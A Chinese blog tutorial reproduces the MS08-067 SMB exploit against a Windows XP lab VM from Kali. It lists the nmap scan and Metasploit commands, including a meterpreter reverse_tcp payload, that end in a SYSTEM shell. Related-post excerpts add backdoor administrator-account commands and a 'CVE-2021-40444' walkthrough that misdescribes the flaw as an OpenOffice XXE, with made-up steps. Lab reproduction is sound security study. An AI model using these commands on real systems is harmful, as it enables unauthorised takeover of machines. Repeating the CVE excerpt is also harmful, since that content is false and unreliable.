MS08-067漏洞复现(Kali+MSF)

已于 2023-06-08 09:16:59 修改
阅读量556 收藏 7
点赞数
分类专栏: 网络安全 文章标签: 安全
于 2023-06-07 18:42:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43620686/article/details/131090543
版权

目录:

环境准备:

漏洞原理:

复现步骤

环境准备:

靶机:Windows XP (安装在虚拟机)

攻击机:Kali

攻击工具:nmap 、msfconsole(下文简称MSF)

漏洞原理:

利用XP系统开放的445端口,使用msf对其进行攻击,从而远程到靶机,即进入到靶机的cmd界面,且拥有system最高权限,后果可想而知

复现步骤

1、使用sudo su 切换至root权限,输入密码(密码不可见,直接键入即可)

┌──(carey㉿kaliJD)-[~]
└─$ sudo su 
[sudo] carey 的密码:

2、使用nmap对目标靶机进行扫描,这里因为我们知道用的是445端口就直接对这个端口进行扫描,查看他的状态。

 这里我们看到445端口的状态是open开启的,OK,那就干他。

  3、启动我们的MSF工具,输入msfconsole后回车等待启动完成。

┌──(root㉿kaliJD)-[/home/carey]
└─# msfconsole

 到这就说名启动完成了

 4、输入ms08-067我们查询这个漏洞的信息。

msf6 > search ms08-067

 5、输入use 0 选择第一个模块进入这个攻击的武器库

msf6 > use 0

 6、输入show options,我们看看需要配置什么。

show options

这里我们可以看到RHOSTS没有值,后面的required是yes,yes表示该项必填,RHOSTS表示靶机地址(可以看到下面有个LHOST,表示攻击机的地址,一般都会默认填上本机IP地址),这里我们看到只需要吧rhosts填上

 7、这里我们利用set +name+值得格式写入靶机地址和使用的武器库(以后遇到其他的字段需要写入值时基本都是这个格式)

msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.171.130

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

再次show options查看写入信息是否正确,检查正确

 8、开始攻击,run

msf6 exploit(windows/smb/ms08_067_netapi) > run

 提示连接了3个回话就表示连接成功

9、输入shell 进入Windows xp的命令行界面,至此就可以为所欲为了。

cary_dan
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用win系统ms08-067漏洞.docx
10-26
利用win系统ms08-067漏洞.docx
docker-kali-msf:带有 Kali + metasploitmsfconsole + postgresql 的 Docker 镜像
06-24
什么 安装了 metasploit 和 metasploit-framework 的 Kali Linux 基础镜像( 元包)。 换句话说,这是一个单一的 ... docker run -t -i --name testy --rm ctarwater/docker-kali-msf 使用我们的 docker run -t -
(菜鸟自学)Metasploit漏洞利用——ms08-067
nbdlsplyb的博客
01-20 1471
MS08-067 是指微软于2008年发布的一个安全漏洞(CVE-2008-4250)。该漏洞影响了 Windows 操作系统中的 Server Service,可被远程攻击者利用来执行任意代码,从而完全控制受影响的系统。这个漏洞主要影响 Windows 2000、Windows XP 和 Windows Server 2003 等早期版本的操作系统。攻击者可以通过发送特制的网络请求,利用该漏洞来执行恶意代码,从而取得对受感染计算机的完全控制权。
MS08-067 漏洞利用与安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1284
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1475
ms08_067,ms10_046
E027-操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固
轻舟已过万重山
10-13 779
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。原理MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。
MS08-067远程代码执行漏洞复现及相关利用
qq_73277309的博客
03-14 595
攻击机: ip:192.168.136.131 网关:192.168.136.255。目标机: ip:192.168.136.138 网关:192.168.136.2。3、提权:net localgroup administrators root /add。2、在目标机上创建一个新的用户:net user root 123456 /add。攻击机:kali 目标机:win xp。一、验证双方是否可以互相ping通。
20221902 2022-2023-2 《网络攻防实践》第六次作业
xiannvyeye的博客
04-15 311
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
docker-kali-msf-micro:带有 Kali + metasploitmsfconsole + postgresql 的 Docker 镜像 - 没有任何 metasploit 模块
06-24
什么 安装了 metasploit 和 metasploit-framework 的 Kali Linux 基础镜像( 元包),但删除了所有的 metasploit 模块。 删除模块确实加快了 ...docker build -t docker-kali-msf-micro . 测试一下: docker run -t
ms08-067溢出工具
10-27
ms08067 利用工具 ms08 067溢出工具 ms08-067漏洞
ms08-067调研加完全复现
08-25
对windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
70-70.渗透测试-kali更新msf.mp4
最新发布
05-10
70-70.渗透测试-kali更新msf.mp4
ms08-067漏洞复现
2302_79119987的博客
04-09 1162
漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出。向靶机发送大量数据,造成缓冲区溢出,渗透成功获得权限,使用shell命令。
ms08-067漏洞复现及所遇到的问题分析
ianTok
10-12 4588
ms08-067
kaliMS08-067漏洞复现
qq_42885246的博客
07-27 272
远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。设置好RHOST和LHOST后,在show options一次,可以看到已经设置好,待触发攻击。现在利用kali的nmap工具对xp系统进行信息搜集看是否存在ms08-067漏洞。使用nmap对靶机端口服务进行扫描,检测目标主机是否存活,以及445端口开放情况。可以看到:目标主机存活(host is up),且445端口开放。使用run命令开始攻击,如下:已成功渗透攻击靶机到后台。
KaliMSFMS08-067漏洞复现详解
m0_59598029的博客
02-24 993
MS08-067漏洞是2008年的一个特大漏洞,该漏洞目前早已修补。ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windowsWindowsxp下载。
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值